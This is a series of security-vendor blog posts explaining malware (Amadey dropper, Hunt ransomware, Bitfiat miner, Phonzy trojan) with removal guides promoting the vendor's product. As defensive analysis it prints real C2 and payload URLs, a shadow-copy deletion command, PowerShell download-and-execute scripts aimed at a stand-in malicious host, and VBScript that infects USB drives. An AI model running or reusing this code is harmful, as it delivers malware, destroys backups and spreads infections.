Hkbsse.exe Overview

Hkbsse.exe is a malicious process that users can notice in Task Manager. This process has no window, which is typical and hints that malware, namely Amadey Dropper, is present on the system. Its main task is to stealthily deliver payloads in the form of other threats to the computer. I.e., it can deliver any malware, such as spyware or ransomware, to the target system. Due to the fact that Hkbsse.exe runs in the background and has a name similar to a system process, users may not immediately notice its presence.

The main method of spreading this malware is spear phishing. That is, the attacker likely has some knowledge about the victim. However, this malware is also spread through hacked programs, games, and generally anything that can be downloaded from torrents or pirate sites. The most common carriers of this malware are cracks, activators, and other software cracking tools. Once on the system, the threat tries to disable built-in defenses and gain the highest privileges on the system. This allows downloaded viruses to run without any restrictions.

Technical Analysis

Let’s take a closer look at what the Hkbsse.exe process is actually doing on the system. Even though it has no visible windows or any signs of activity, the most important actions happen behind the scenes. As I mentioned earlier, if you see the Hkbsse.exe process, then your system is infected with Amadey Dropper malware (sample on VirusTotal). Let’s break down the entire lifecycle of this malware.

Step 1. Initial Access

Throughout the lifecycle, the threat abuses the legitimate Windows Error Reporting Service to avoid triggering anti-malware. Once on the system, the first thing it does is check if there are other instances of this malware running on the system. To do this, it checks for the following mutexes:

Global\SyncRootManager
Local\__DDrawCheckExclMode__
CicLoadWinStaWinSta0
Local\WininetConnectionMutex
Local\WininetProxyRegistryMutex
Local\WininetStartupMutex
Local\_!MSFTHISTORY!_
Local\c:!users!admin!appdata!local!microsoft!windows!history!history.ie5!

If any mutexes are found, the malware terminates further execution. If no mutexes are detected, the malware creates them. As I said above, this is a standard malware practice that prevents multiple copies from running on the same system.

Local\SessionImmersiveColorMutex
Local\ZoneAttributeCacheCounterMutex
Local\ZonesCacheCounterMutex
Local\WininetConnectionMutex
Local\WininetProxyRegistryMutex
Local\WininetStartupMutex

The next step is to check for anti-malware programs and whether the system is virtualized. Depending on the results, the behavior of the malware may vary, but it is not always about stopping the execution completely. Most likely, when seeing an enterprise VM, the virus will move on . Specifically, the threat checks the following values:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\Software\Microsoft\LanguageOverlay\OverlayPackages\en-US
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap

As you can see, some keys determine the geographical location of the system and its language. Since Amadey Dropper has Russian roots, it has a hard-coded rule not to attack computers located in Russia. In addition, this data is needed to create a fingerprint of the system.

Step 2. Persistence

Next, the malware tries to gain persistence on the system. After performing all the checks, making sure that the threat is not running on a virtual system, it adds a copy of itself to sections responsible for autorun. The malware adds itself to the following partitions:

C:\Windows\System32\Tasks\Hkbsse
C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask
C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTaskLogon
C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTaskNetwork
C:\Windows\Tasks\Hkbsse.job

This allows the threat to run with the system even if the process has been forcefully terminated. This includes both user interrupting the execution and any of the actions from security programs.

Step 3. C2 Connection and Payload

After all the preparations are done, the malware accomplishes its main task: deliver the payload to the system. But before it does that, the malware contacts the C2 server, sends the system’s fingerprint and waits for further commands. It sends the following requests:

POST http://185.215.113.26/Dem7kTu/index.php 200
POST http[:]//epohe.ru/tmp/
POST http[:]//sevtvd17ht.top/v1/upload.php 200

Next, the malware gets a response from C2 containing instructions and the actual payload server address, which is as follows:

GET http://185.215.113.26/JLumma.exe 200
GET http://185.215.113.26/JUmer.exe 200
GET http://iakovosioannidis.com/parts/setup2.exe 200

This is how Amadey Dropper delivers the payload to the system. Next, the malware decompresses the payload, resulting in the Hkbsse.exe process that we talked about at the beginning. Among the files delivered by this specific sample, there is Lumma Stealer – a rather notorious virus in recent times.

How To Remove Hkbsse.exe?

If you have found Hkbsse.exe running in your Task Manager, it likely means that Microsoft Defender missed it for some reason. This may be because that you manually added the threat to the exceptions, or the threat may have disabled Defender. Anyway, you will now need a third-party anti-malware solution to neutralize the threat. I recommend GridinSoft Anti-Malware as it can effectively remove threats and does not conflict with Microsoft’s built-in solution. Follow these instructions to clean your PC from threats.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post What is the Hkbsse.exe Process? appeared first on Gridinsoft Blog.

Is Safe Mode Good for Malware Removal?

Despite being quite useful for malware removal operations, Safe Mode was not meant for this kind of activities. Its main purpose is troubleshooting: in this mode, Windows starts without quite a few modules, startup programs and things planned in Task Scheduler. This, however, is exactly what prevents malicious programs from executing, since the majority of them rely on either startup or the Scheduler.

Why would one need all this during malware removal? While active, viruses may block executable files from running, or overload the system making any operations impossible to accomplish. The latter is characteristic of coin miners and, in some cases, proxyware. This makes installing antivirus and anti-malware programs nearly impossible, and Safe Mode allows omitting these problems altogether.

How To Run Windows in Safe Mode

There are several ways to enter Safe Mode, which vary depending on certain factors. One particular thing I recommend you to stick to is using Safe Mode with Networking, as it allows connecting to the Internet. If you are using Windows without a password on your user account, it will be much easier to get into Safe Mode. For Windows 10/11 without a user account password, you can follow these steps:

Method 1. Using the Restart Option

Click “Start”, click “Power”, and then click “Restart” while holding the Shift key.

In the menu that appears, select “Troubleshoot” → “Advanced options” → “Startup Settings” → “Restart”.

Then choose the Safe Mode with Networking and press the corresponding key (usually F4 or F5, depending on Windows version).

Method 2. Using Settings

Click “Start” and open “Settings”. In the left menu, click “System”, then scroll down and click “Recovery”.

Under “Recovery options”, select “Advanced startup” and click “Restart now”. Then follow steps 2 and 3 from the first method.

Method 3. Interrupting Normal Boot

Another way to get into Safe Mode is to interrupt the normal boot process three times in a row. In case of three consecutive unsuccessful boots, the OS will automatically enter the Windows Recovery Environment (WinRE), which is useful if you are unable to start Windows for some reason. After this, follow steps 2 and 3 from the first method.

Windows with a User Account Password

If your device is protected by a user account password, you will not be able to use the previous methods. This is related to Windows security and BitLocker, which encrypts all disks. The only way to enter Safe Mode in this case is through System Configuration. Follow these steps:

Press the Win key + R, and in the window that opens, type “msconfig”.

In the System Configuration window, go to the “Boot” tab. Under Boot options, check the “Safe boot” checkbox.

Click “Apply”, then click “Restart”. Now your system will default to booting in Safe Mode until you perform the first two steps again and uncheck the “Safe boot” checkbox.

How to Remove Malware and Viruses in Safe Mode?

If you’ve decided to remove malware from your device with the use of Safe Mode, you may need to know where to look for malware. There are several locations as well as visual signs that may help you with locating the threat. However, I still recommend combining this mode with an anti-malware scan, which I will show later.

Typically, the majority of malware follows certain patterns in where it stores its file. Knowing even a few key locations can help detect the threat in just a few clicks. Malware often uses temporary or hard-to-reach system folders, such as AppData\Roaming\Temp, root directory of AppData\Roaming, and AppData/Local. By default, these folders are hidden from the user, so you need to enable the display of hidden files in the File Explorer settings to access them.

In addition to the location, it is important to pay attention to files with strange or unfamiliar names. Malware usually uses random combinations of letters or numbers to make them look like some generic log files. Another thing to check is the digital signature certificates of the files, especially if there’s a suspiciously looking file that has a valid name. If the certificate issuance date indicates the future, or the issuer is an unrelated company, it is most definitely malware.

However, detecting and removing malware manually is not only an extremely labor-intensive process but also not always effective. Malicious programs often create copies of themselves in the system and regenerate from them after deletion. This is why using specialized tools that automatically and reliably detect and remove malware is the best solution. As mentioned earlier, Safe Mode disables most Windows services, including Microsoft Defender. It cannot be enabled until you boot the computer in standard Windows mode.

To remove malware in this mode, you need to install third-party solutions. This is why network access is necessary after entering Safe Mode—the malware might block the installation. GridinSoft Anti-Malware is an excellent solution for removing malware in Safe Mode. The detection databases of this antivirus are updated hourly; additionally, it offers a Proactive Protection feature, which protects the system in the background after a normal system boot. Combined with the overall ease of use of the program, it becomes a great option for any system.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post How to Remove a Virus From a Computer in Safe Mode appeared first on Gridinsoft Blog.

Ransomware remains a major threat, attacking both organizations and individuals. GridinSoft Anti-Malware provides excellent protection even against the most modern malware samples. Get yourself proper ransomware protection

What is Hunt Ransomware (bughunt@keemail.me)?

As I’ve said in the introduction, Hunt is a novice sample of the Dharma ransomware family. Being its part, Hunt ransomware follows its behavior patterns. The most noticeable one for the victim is the application of a complex extension, that contains the victim’s ID, the contact email (bughunt@keemail[.]me) and its .hunt extension. The files start looking as below after the encryption:

image.png → image.png.id-C3B22A85.[bughunt@keemail.me].hunt
document.docx → document.docx.id-C3B22A85.[bughunt@keemail.me].hunt

Hunt ransomware goes through the entirety of user disks, searching for the files it can encrypt. It is capable of ciphering the vast majority of ones, from images and videos to project files of specific software suites. However, this malware carefully avoids any system files – probably, to prevent system malfunctions that can potentially force the user into reinstalling the system.

Before applying the encryption, this malware disables built-in Windows backup options, such as Restore Points and Shadow Copies. They are rather useful for reverting the system state to pre-encryption, so such action is rather expected. Hunt ransomware uses the command you can see below to accomplish this.

vssadmin delete shadows /all /quiet

After finishing the encryption (i.e. it can’t find more unencrypted files), Hunt ransomware spawns a text file with a ransom note. It also opens an HTA file with the information about with more detailed information about what’s happened and instructions for the ransom payment. You can see the example of this pop-up window below.

How to Decrypt .hunt Files?

There is no dedicated decrypting utility for Hunt ransomware available at the moment. This malware uses strong encryption algorithms, so brute force will take gazillion years to accomplish. However, not everything is lost – tools that exploit flaws in encryption algos may appear, or law enforcement may take the ransomware down and release the decryption keys. During the first quarter of 2024, several decryption tools were released, so chances are not that slim.

For now, I can advise you to seek backups outside of the infected system. Cloud storages can contain the files this malware damaged in the attack. Places like social media, email conversations and messengers may contain the originals of the files, too. Even though they may not contain the latest changes, it is better than nothing.

How to Remove Ransomware?

To get rid of the ransomware, I recommend using GridinSoft Anti-Malware. This step is incredibly important to do before performing any attempts to recover the files. The malware remains active, and will instantly encrypt the fresh files. To prevent this and get rid of the infection, run a Full Scan with GridinSoft program and clean all the detected malicious programs.

The post Hunt Ransomware (bughunt@keemail.me) appeared first on Gridinsoft Blog.

What is Trojan:Script/Ulthar.A!ml?

Trojan:Script/Ulthar.A!ml is a generic detection name assigned by Microsoft Defender to a malicious script. Such threats may belong to different malware families, but to simplify the designation, Microsoft groups them by characteristics.

The majority of known Ulthar A!ml cases are attributed to file archives, both of the .zip/.rar and .jar formats. This implies that the detection refers to a threat that uses code packing. Considering the features of archived files, including virtualization used to run Java archives, it is important to take this detection seriously.

Ulthar.A!ml Malware Analysis

During the analysis of Trojan:Script/Ulthar.A!ml, I’ve detected quite a lot of cases when it was assigned to benign files, i.e. was a false positive detection. Popular malware sandboxes and collections did not contain any fresh samples of the malware detected with this name. At the same time, there were some similar malware samples, which simplified my research.

The signature name gives a couple of clues to start with. Trojan:Script is a header attributed to malicious scripts; “Trojan” part means it may be of any purpose, from gaining initial access to collecting data and delivering other malware. The proper name, “Ulthar“, is not a reference to a Lovecraft book but an umbrella designation of malicious software that shares similar properties. And this is where other clues appear.

As I said, sandboxes do not keep any records regarding Trojan:Script/Ulthar.A!ml, i.e. this specific name. However, VirusTotal keeps the analysis of a malicious program detected as Trojan:Win32/Ulthar.A!ml – not completely the same thing. But the fact that it has the same name means it shares the same core functions with that one Ulthar we are interested in.

So, what is Ulthar trojan? According to the data from several sources, it is a backdoor, with quite a tricky detection and analysis evasion procedure. It in particular checks whether it is running on a VM or the debug environment, and then protects its file and directory it is located in. After doing all these checks and actions, Ulthar switches to collecting system information – most likely, to create a fingerprint and ease the distinction between this machine and others.

Typically for backdoors, Ulthar provides remote access to the system. However it looks like this access is not about a real-time connection, but about remote changes done to the system. Malware grants hackers a lengthy list of things they can do in the infected system. This functionality ranges from editing system registry and directories to launching specific files. The latter, actually, is the biggest potential danger, as it means Ulthar can deploy other malware.

Is Trojan:Script/Ulthar.A!ml False Positive?

As I’ve mentioned, Trojan:Script/Ulthar.A!ml name often appears as a false positive detection. In fact, the majority of online feedback points at this detection pointing at completely legit and safe files, particularly game mods kept in archives. And while malware can be stored in archives, the detections described by different users are related to the files that are quite hard to doubt.

One specific reason why this false detection appears is its origination from the AI detection system of Microsoft Defender. This is, exactly, what the “!ml” particle in the end stands for. The latter has its merits, but may create problems when failing to confirm the detection through other detection systems. But don’t think all the “!ml” detections are false – this would be a costly mistake!

To see whether the file affected by the Trojan:Script/Ulthar.A!ml detection is false positive or not, consider using our GridinSoft Online Virus Scanner. It is completely free, and will show you whether you should be concerned or not in a matter of seconds. Just upload the file, and wait for the verdict.

How to Remove the Trojan:Script/Ulthar.A!ml from PC?

It is not easy to see whether the detected file is malicious or not without special software. I recommend checking your system with reliable and effective software like GridinSoft Anti-Malware. It particularly has a function called Custom Scan, which enables scanning archives – the right thing you may need for this case. After doing so, you’ll be sure for sure if it’s a virus or not. Keep your Anti-Malware updated to the latest version and keep yourself safe when surfing the internet.

The post Trojan:Script/Ulthar.A!ml appeared first on Gridinsoft Blog.

Bitfiat Overview

The Bitfiat process is related to the activity of a malicious coin miner. Such malware uses your computer’s resources to mine cryptocurrencies, mainly Monero or DarkCoin. An unusual part about Bitfiat is its origins: it is based on its own technology rather than using XMRig code. This, however, is the last part where it is different from other malware miners – its behavior is as unpleasant as in other cases.

As for the symptoms, they are typical: it causes the CPU to run at maximum capacity, often reaching 100%. You may also notice that your computer’s fan runs at full speed even when you are not using any programs. Moreover, this process usually appears in Task Manager and consumes the most resources. Although coin miners usually don’t harm your files, they make your system unusable due to an overloaded CPU.

Bitfiat Virus Analysis

Despite having the origins different from the majority of malware miners, the infection chain of Bitfiat is pretty much the same. Let’s start from the very beginning and explore the operations of this malware. Fortunately, there are enough samples to analyze.

Spreading Methods

Bitfiat propagates through various channels, primarily leveraging cracked software and software activators “cracks”. These cracks are often distributed through illicit channels (like torrents) and online forums. It entices users with the promise of unlocking premium software features without needing to purchase. Even though it sounds like fairy tales, unwary users keep downloading such “free” premiums.

Another spreading way is botnets. By paying a coin to the masters of a botnet established with dropper malware, crooks can provide themselves with massive amounts of mining nodes. Thing is, after deploying the malware like a coin miner the entire malware spreading chain will be uncovered, and the dropper will be most likely removed from the machine. To maximize profits, miners are spread along with other “visible” malware, like ransomware or proxyware.

Launch, C2 Connection & Mining

The majority of Bitfiat samples do not have any detection evasion tricks. And, well, how can you evade the detection when your process takes up to 80% of the CPU? Right after launching, the malware performs an IP check, then collects some basic info about the system and connects to the command server.

Command servers used by Bifiat are rather unusual: there is no direct connection to the “main” C2. Instead, malware retrieves the needed instructions from the other infected machine, i.e. they operate like a p2p network. This provides much better stability, up to autonomous existence in the cases when the command server is unresponsive.

The said instructions in a form of config file contain the info about mining pool and crypto wallet address. After executing a few command prompt lines, it starts the mining process. And this is the point where the most noticeable sign of a malware miner activity appears – overloaded CPU and a strange process in the list of running programs.

How To Remove Bitfiat?

Effective removal of the crypto miner requires a complex approach to neutralize all malware actions. Unlike other types of malware, a miner can overload the system so that the removal tool has no resources left. To avoid these issues, the removal guide should have one more step.

• Download and install GridinSoft Anti-Malware. The first thing to do is to deploy the removal tool, even though it will be used later.

• Switch your Windows to Safe Mode with Networking. By booting into the Safe Mode with Networking, you prevent the Bitfiat process from exerting its influence on the CPU. This will facilitate uninterrupted removal by antivirus software.
• Start the Full Scan. By running a Full Scan, you make the program check every single element of the system. Such a thorough scan is essential to ensure that all the malware present in the system is removed. After the scan, click “Clean Now” to get rid of all the detected items.

The post Bitfiat Process High CPU – Explained & Removal Guide appeared first on Gridinsoft Blog.

Trojan:Script/Phonzy.B!ml Overview

Trojan:Script/Phonzy.B!ml is a generic detection name that Microsoft Windows Defender uses to identify a family of similar malware threats. While these malicious programs may share behavioral patterns and code characteristics, they often belong to different malware families, making complete identification challenging through automated detection alone.

Functionally, Phonzy.B!ml operates as a scripted dropper malware. Its primary purpose is to download and execute additional malicious payloads without requiring user interaction. Beyond this core function, Phonzy samples are designed to collect extensive information about the infected system, including geographical location, operating system details, installed applications, and hardware specifications. The typical payload delivered in Phonzy malware attacks consists of sophisticated banking trojans – specialized credential stealers that target online banking information, financial credentials, and digital payment data.

Is Phonzy B!ml a False Positive?

Looking deeper at Microsoft’s detection naming conventions reveals that the “!ml” suffix stands for “machine learning”, indicating that the threat was identified by Microsoft’s artificial intelligence detection engine. While highly effective, machine learning detection sometimes requires confirmation through traditional signature-based systems. Without this secondary verification, the possibility of false positive detections increases significantly.

Unfortunately, reliably distinguishing between legitimate false positives and actual Phonzy infections can be challenging. Modern malware employs sophisticated obfuscation techniques to blend seamlessly with legitimate system files, making file location alone insufficient for identification. For this reason, we strongly recommend scanning your system with GridinSoft Anti-Malware to obtain a definitive analysis and ensure complete removal of any threats.

Phonzy.B!ml Technical Analysis

Since Phonzy is a generic detection name covering multiple malware variants, identifying a single representative sample for analysis presents challenges. To provide a comprehensive understanding of this threat, we’ve analyzed several specimens to document the full range of capabilities. In summary, while Phonzy appears to be a relatively simple dropper on the surface, it can cause extensive damage to infected systems through the secondary malware it deploys.

Infection Vector and Launch Mechanism

The majority of Phonzy samples we’ve encountered arrive in an obfuscated, packed form – typically encrypted and/or archived. This packaging serves two primary purposes: evading static detection mechanisms and complicating forensic analysis. In the case of Phonzy variants, evading detection appears to be the primary motivation.

To execute the unpacking process, Phonzy relies on the initial script that downloads the malware to the target system. This is typically a PowerShell script that retrieves the dropper from an intermediary command and control (C2) server. Below is an example of a typical obfuscated PowerShell script used in Phonzy distribution:

$e3Df = [System.IO.Path]::GetTempPath();
$k9jL = "$e3Df\t8R4.exe";
$w32c = New-Object System.Net.WebClient;
$w32c.Headers.Add("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36");
try {
    $w32c.DownloadFile("hxxp://malicious-server.com/payload.bin", $k9jL);
    $b9Te = [System.IO.File]::ReadAllBytes($k9jL);
    for($i=0; $i -lt $b9Te.length; $i++) {
        $b9Te[$i] = $b9Te[$i] -bxor 0x43;
    }
    [System.IO.File]::WriteAllBytes($k9jL, $b9Te);
    Start-Process $k9jL;
} catch {
    Remove-Item $k9jL -ErrorAction SilentlyContinue;
}

The script above demonstrates how Phonzy is downloaded, decrypted with a simple XOR operation, and then executed on the target system. In a real attack, this script would be significantly more obfuscated to avoid detection.

We recently documented a sophisticated campaign that bypasses traditional infection steps by tricking users into running malicious PowerShell scripts directly. While that campaign delivered Lumma Stealer, the same infrastructure and techniques could easily be adapted to distribute Phonzy variants or any other malware family.

System Reconnaissance

Once successfully executed, Trojan:Script/Phonzy.B!ml begins collecting comprehensive information about the compromised system. This reconnaissance phase typically includes gathering details about:

• Operating system version and architecture
• Hardware specifications (CPU, RAM, disk space)
• Installed applications and security software
• Connected devices and peripherals
• Geographic location based on IP address
• User account information and privileges
• Browser data and saved credentials

This information is used to create a unique fingerprint of the infected system, allowing attackers to track individual infections and potentially tailor subsequent payloads accordingly. Some advanced Phonzy.B!ml variants also include functionality to capture screenshots of the victim’s desktop, providing attackers with visual information about the compromised environment.

Command and Control Communication

Following the reconnaissance phase, Phonzy establishes communication with its command and control infrastructure. The malware sends an HTTP POST request to the C2 server, notifying the attackers of the new infection and transmitting the collected system information. Depending on the response received from the server, the malware may:

• Remain dormant to avoid detection
• Download additional malware payloads
• Execute specific commands on the infected system
• Uninstall itself if the target is deemed unsuitable

While the C2 communication protocols employed by Phonzy variants are relatively simplistic, they are designed to blend in with normal web traffic to avoid detection by network monitoring solutions. Below is an example of a typical HTTP request pattern used by Phonzy:

POST /gate.php HTTP/1.1
Host: malicious-server.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 2048

id=MACHINE_ID&os=Windows+10+Pro&arch=x64&av=Windows+Defender&installed=Chrome,Office,Adobe&admin=true&version=1.2

Secondary Payload Delivery

The primary function of Phonzy Trojan is downloading and executing secondary malware payloads. Upon receiving instructions from the C2 server, Phonzy will download additional malware from specified URLs, typically compromised websites used as intermediary distribution points to obscure the actual source of the malicious code.

For executing secondary payloads, Phonzy employs several techniques depending on the payload type:

• Executable Files (.exe): Direct execution through process creation
• Dynamic Link Libraries (.dll): Loaded through DLL hijacking or injection into legitimate processes
• Script Files (.ps1, .vbs, .js): Executed through appropriate scripting engines
• Document Files (.doc, .xls): Opened with legitimate applications to trigger embedded macros

The following PowerShell code demonstrates how Phonzy might execute a downloaded DLL payload through rundll32:

# Function to download and execute DLL payload
function Invoke-DllPayload {
    param(
        [string]$PayloadUrl,
        [string]$EntryPoint
    )
    
    $TempPath = [System.IO.Path]::GetTempPath()
    $PayloadPath = Join-Path $TempPath ([System.Guid]::NewGuid().ToString() + ".dll")
    
    try {
        # Download the DLL
        (New-Object System.Net.WebClient).DownloadFile($PayloadUrl, $PayloadPath)
        
        # Execute the DLL using rundll32
        $Command = "rundll32.exe $PayloadPath,$EntryPoint"
        Start-Process -FilePath "cmd.exe" -ArgumentList "/c $Command" -WindowStyle Hidden
        
        return $true
    }
    catch {
        return $false
    }
}

# Call the function with parameters from C2 server
Invoke-DllPayload -PayloadUrl "hxxp://compromised-site.com/payload.dll" -EntryPoint "DllMain"

USB Drive Propagation

Some advanced variants of Phonzy.B!ml include self-propagation capabilities, allowing the malware to spread via attached USB drives and other removable storage media. This worm-like behavior is relatively uncommon in modern malware, as security vendors have developed robust detection methods for such propagation techniques. However, this approach remains effective in certain environments, particularly those with limited security measures or air-gapped networks.

The USB infection mechanism typically works by:

1. Monitoring for newly connected USB storage devices
2. Creating hidden folders on the device to store malware payloads
3. Modifying or creating autorun.inf files to trigger execution when connected to a new system
4. Converting legitimate executables on the drive into infected versions
5. Creating shortcut files that execute malware while opening legitimate content

The following is a simplified example of code that might be used by Phonzy to monitor for and infect USB drives:

' VBScript example of USB drive infection mechanism
Option Explicit

Dim fso, wsh, drives, drive
Set fso = CreateObject("Scripting.FileSystemObject")
Set wsh = CreateObject("WScript.Shell")

' Monitor for new drives
Sub MonitorDrives()
    On Error Resume Next
    
    ' Get current drives
    Set drives = fso.Drives
    
    ' Check each drive
    For Each drive in drives
        ' Look for removable drives
        If drive.DriveType = 1 And drive.IsReady Then
            InfectDrive drive.Path
        End If
    Next
    
    ' Continue monitoring
    WScript.Sleep 5000
    MonitorDrives
End Sub

' Infect a specific drive
Sub InfectDrive(drivePath)
    On Error Resume Next
    
    ' Create hidden folder
    fso.CreateFolder drivePath & "\System Volume Information"
    wsh.Run "attrib +h +s """ & drivePath & "\System Volume Information""", 0, True
    
    ' Copy malware payload
    fso.CopyFile WScript.ScriptFullName, drivePath & "\System Volume Information\svchost.exe"
    
    ' Create autorun.inf
    Dim autorun
    Set autorun = fso.CreateTextFile(drivePath & "\autorun.inf", True)
    autorun.WriteLine "[AutoRun]"
    autorun.WriteLine "open=System Volume Information\svchost.exe"
    autorun.WriteLine "action=Open files on this drive"
    autorun.Close
    
    ' Hide autorun.inf
    wsh.Run "attrib +h +s """ & drivePath & "\autorun.inf""", 0, True
    
    ' Create shortcuts to legitimate files
    CreateMaliciousShortcuts drivePath
End Sub

' Create malicious shortcuts to existing files
Sub CreateMaliciousShortcuts(drivePath)
    ' Implementation details omitted for brevity
End Sub

' Start monitoring
MonitorDrives

How To Remove Trojan:Script/Phonzy.B!ml

Removing Phonzy B!ml malware requires a thorough approach due to its ability to download multiple malicious payloads and establish persistence mechanisms. We strongly recommend using GridinSoft Anti-Malware, which is specifically designed to detect and eliminate complex malware threats including all components and payloads associated with Phonzy infections.

Automated Removal with GridinSoft Anti-Malware

Follow these steps to completely remove Trojan:Script/Phonzy.B!ml and any associated malware from your system:

Step 1: Download and Install GridinSoft Anti-Malware

Download GridinSoft Anti-Malware using the button below. Before starting the installation, disconnect from the internet and close all browser windows to prevent any potential interference from active malware.

Step 2: Run a Full System Scan

Launch GridinSoft Anti-Malware and select the “Full Scan” option to conduct a comprehensive examination of your entire system. This will detect Phonzy.B!ml and any other malware that may have been downloaded as secondary payloads.

Step 3: Remove All Detected Threats

After the scan completes, review the list of detected threats. Select all items and click “Clean Now” to remove Phonzy.B!ml and all associated malware components from your system.

Step 4: Reset Your Browsers

Since banking trojans commonly delivered by Phonzy target browser data, it’s essential to reset all installed browsers to remove any malicious extensions, hijacked settings, or injected code:

1. In GridinSoft Anti-Malware, navigate to the “Tools” tab
2. Select “Reset Browser Settings”
3. Choose all browsers installed on your system
4. Click “Reset” to restore browsers to their default state

Step 5: Scan Removable Devices

Since some Phonzy variants can spread via USB drives, scan all removable storage devices that have been connected to your computer:

1. Connect each USB drive or external storage device one at a time
2. In GridinSoft Anti-Malware, select “Custom Scan”
3. Choose the connected removable drive
4. Complete a full scan and remove any detected threats

Step 6: Enable Proactive Protection

To prevent future infections, enable GridinSoft Anti-Malware’s proactive protection features:

1. Navigate to the “Protect” tab
2. Enable “Real-Time Protection” to guard against future threats
3. Enable “Removable Device Protection” to prevent USB-based infections
4. Click “Apply” to save your protection settings

Manual Removal Instructions for Advanced Users

While automated removal is strongly recommended, technically proficient users may attempt manual removal. Be aware that this approach requires advanced system knowledge and carries risks if performed incorrectly.

Step 1: Boot into Safe Mode

1. Press Win + R, type “msconfig” and press Enter
2. Go to the “Boot” tab
3. Check “Safe boot” and select “Minimal”
4. Click “Apply” and “OK”
5. Restart your computer when prompted

Step 2: Stop Malicious Processes

1. Press Ctrl + Shift + Esc to open Task Manager
2. Look for suspicious processes (random names, system locations, high resource usage)
3. Right-click suspicious processes and select “End Task”
4. For persistent processes, note their location for later removal

Step 3: Remove Malicious Files

Common Phonzy file locations include:

C:\Users\[Username]\AppData\Roaming\[random name].exe
C:\Users\[Username]\AppData\Local\Temp\[random name].exe
C:\Windows\Temp\[random name].dll
C:\ProgramData\[random name]\[random name].exe

Step 4: Remove Registry Entries

Press Win + R, type “regedit” and press Enter. Look for and delete these registry entries:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\[random name]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\[random name]
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\[random name]

Step 5: Disable Malicious Scheduled Tasks

1. Press Win + R, type “taskschd.msc” and press Enter
2. Look for tasks with random names or suspicious actions
3. Right-click suspicious tasks and select “Delete”

Prevention Recommendations

To protect your system from Trojan:Script/Phonzy.B!ml and similar threats, implement these security best practices:

• Avoid pirated software and unauthorized downloads – Cracked software is frequently used to distribute malware like Phonzy
• Be cautious with email attachments – Never open attachments from unknown senders or unexpected messages
• Keep systems and software updated – Install security updates promptly to patch vulnerabilities
• Use advanced security software – GridinSoft Anti-Malware provides proactive protection against emerging threats
• Enable USB drive protection – Utilize security features that scan removable media before accessing its contents
• Be wary of fake download sites – Verify website legitimacy before downloading any software
• Implement regular backups – Maintain current backups of important data to minimize impact of potential infections

GridinSoft Anti-Malware’s Removable Device Protection feature is particularly effective at blocking attempts by Phonzy and other malware to infect systems via USB drives, providing an essential layer of protection against this specific infection vector.

Frequently Asked Questions

How does Trojan:Script/Phonzy.B!ml infect systems?

Trojan:Script/Phonzy.B!ml typically infects systems through several methods, including phishing emails with malicious attachments, drive-by downloads from compromised websites, bundled software installations (especially cracked or pirated software), and infected USB drives. The initial infection usually involves a PowerShell or other script that downloads and executes the main Phonzy payload, which then contacts its command and control server for further instructions and additional malware downloads.

What damage can Phonzy.B!ml cause to my computer?

While Phonzy.B!ml itself primarily functions as a dropper, the secondary payloads it delivers can cause extensive damage. Banking trojans commonly delivered by Phonzy can steal financial credentials, leading to unauthorized transactions and identity theft. Other potential payloads include ransomware that encrypts your files, cryptominers that consume system resources, and backdoors that provide attackers with persistent access to your system. Additionally, the system reconnaissance performed by Phonzy compromises your privacy by collecting and transmitting sensitive information about your computer and browsing habits.

Why does Microsoft Defender label this threat with ‘!ml’ in its name?

The ‘!ml’ suffix in Microsoft Defender detection names indicates that the threat was identified using machine learning algorithms rather than traditional signature-based detection. This approach allows Microsoft to detect previously unseen malware variants based on behavioral similarities to known threats. While machine learning detection provides excellent protection against emerging threats, it occasionally results in false positives. When you see the ‘!ml’ designation, it’s advisable to verify the detection using a specialized anti-malware tool like GridinSoft Anti-Malware, which employs multiple detection techniques to provide more definitive results.

Can Phonzy.B!ml steal my banking credentials?

Phonzy.B!ml itself doesn’t directly steal banking credentials, but it frequently downloads and installs banking trojans specifically designed for this purpose. These secondary payloads employ various techniques to capture financial information, including keylogging (recording keystrokes), form grabbing (capturing data entered into web forms), screen capturing during banking sessions, and web injection (inserting malicious code into banking websites to harvest credentials). To protect your financial information after a Phonzy infection, you should completely remove all malware, reset your browsers, change passwords for all financial accounts using a clean device, and monitor your accounts for unauthorized activity.

The post How to Remove Trojan:Script/Phonzy.B!ml Malware appeared first on Gridinsoft Blog.

What is Oneetx.exe process?

Oneetx.exe is a disguised name chosen by Amadey dropper developers to hide their malware among other processes. Windows tracks all processes running in the system and displays what it found in Task Manager. Obviously, obfuscated names like sv39103.exe will attract attention and raise suspicion. That is the reason why hackers opt for some ordinary names. Their often choice is system processes or ones related to popular software packages, like Photoshop or crypto mining software. This case, however, is different.

